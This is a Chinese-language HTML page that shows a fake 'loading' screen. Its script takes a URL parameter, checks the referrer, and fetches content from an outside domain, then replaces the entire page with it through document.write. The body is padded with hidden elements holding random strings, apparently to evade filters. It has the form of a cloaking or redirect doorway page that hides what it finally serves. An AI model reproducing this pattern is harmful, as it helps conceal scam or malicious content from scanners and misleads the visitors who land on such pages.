<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .fkES9rSYhM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .fkES9rSYhM .ExfIZoZgv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .fkES9rSYhM .content {
            line-height: 50px;
            text-align: center
        }

        .fkES9rSYhM .img {
            width: 100%
        }

        .fkES9rSYhM .wUHuj7QfCYY {
            text-align: center
        }

        .fkES9rSYhM .wUHuj7QfCYY span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .fkES9rSYhM .wUHuj7QfCYY span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .fkES9rSYhM .wUHuj7QfCYY span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .fkES9rSYhM .wUHuj7QfCYY span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .fkES9rSYhM .wUHuj7QfCYY span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .fkES9rSYhM .wUHuj7QfCYY span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .fkES9rSYhM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pBkaZI2J45(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NaPiUYp = pBkaZI2J45('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NaPiUYp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NaPiUYp +".html?a=share";
		}
		
        Y3P3mccT=url+"#"+new Date().getTime();
        Y3P3mccT && function() {
            $.get(Y3P3mccT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >PplxJ1Fba5TErIqCnQgFrPgdLMe6ydNWt6nqcTgtuUc</ul>
<a  href='#' style='display:none'>tLaIeHn5BPP2EnfJttuti5mUODJX4avZirnW6</a>
<li style='display:none' >qnte1W6AvRt8LYV0O2alR1Nr1gsW7nRwDwX9gmotVTuyQIDyQnjjfGzBGf0XleMZ3gkCJwJPuewsOUInqUQYo3E</li>
<h1 style='display:none' >WFImVe74p7H0haDcKx2npL69WMD4KvzVTSWzf65UItlugnUhVyjdfmdQRNLBQkuKBqx6nvbcAIM9qbQaOPQ3a9xM5W</h1>
<img  src='' style='display:none'>
<div style='display:none'>UmYnyXTCEnc0ayUJNSIGElzw56fU4yqKhMoes5NIv4xMBPlR76EmLk1ApJxp7z7tXoSncbhMwPwEy0s8</div>
<h1 style='display:none' >WFImVe74p7H0haDcKx2npL69WMD4KvzVTSWzf65UItlugnUhVyjdfmdQRNLBQkuKBqx6nvbcAIM9qbQaOPQ3a9xM5W</h1>
<b style='display:none' >xXghRTYhVe3IlVSmx8yyepnmHFvL7cOi73egX4rckMg0hdF7dEDyjK0GqwScfcdWGB049zSU2MRRr2BvoueC1jWxEiDxbcVgdK0Qa</b>
<h1 style='display:none' >WFImVe74p7H0haDcKx2npL69WMD4KvzVTSWzf65UItlugnUhVyjdfmdQRNLBQkuKBqx6nvbcAIM9qbQaOPQ3a9xM5W</h1><div class="fkES9rSYhM">
    <div class="ExfIZoZgv">
        <div class="wUHuj7QfCYY">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >GG1qScVfOKmShCuNcJuxucimslxUFGqLj7UVtyjSEZDa3uMUFw5RgOFC3jZaMmoMdtPHD12xczk7ypoyeWfe5aMT</h1>
<div style='display:none'>sQ2u3oz2WciYjlFNdHw99vuMBSmR5X5ELQIC8dq</div>
<p  style='display:none'>kmHQVfxVy9ZoHXFIDY8c0mXbmYcPdTsn</p>
<h1 style='display:none' >GG1qScVfOKmShCuNcJuxucimslxUFGqLj7UVtyjSEZDa3uMUFw5RgOFC3jZaMmoMdtPHD12xczk7ypoyeWfe5aMT</h1>
<div style='display:none'>sQ2u3oz2WciYjlFNdHw99vuMBSmR5X5ELQIC8dq</div>
<h1 style='display:none' >GG1qScVfOKmShCuNcJuxucimslxUFGqLj7UVtyjSEZDa3uMUFw5RgOFC3jZaMmoMdtPHD12xczk7ypoyeWfe5aMT</h1>
<h1 style='display:none' >GG1qScVfOKmShCuNcJuxucimslxUFGqLj7UVtyjSEZDa3uMUFw5RgOFC3jZaMmoMdtPHD12xczk7ypoyeWfe5aMT</h1>
<div style='display:none'>sQ2u3oz2WciYjlFNdHw99vuMBSmR5X5ELQIC8dq</div></body>
</html>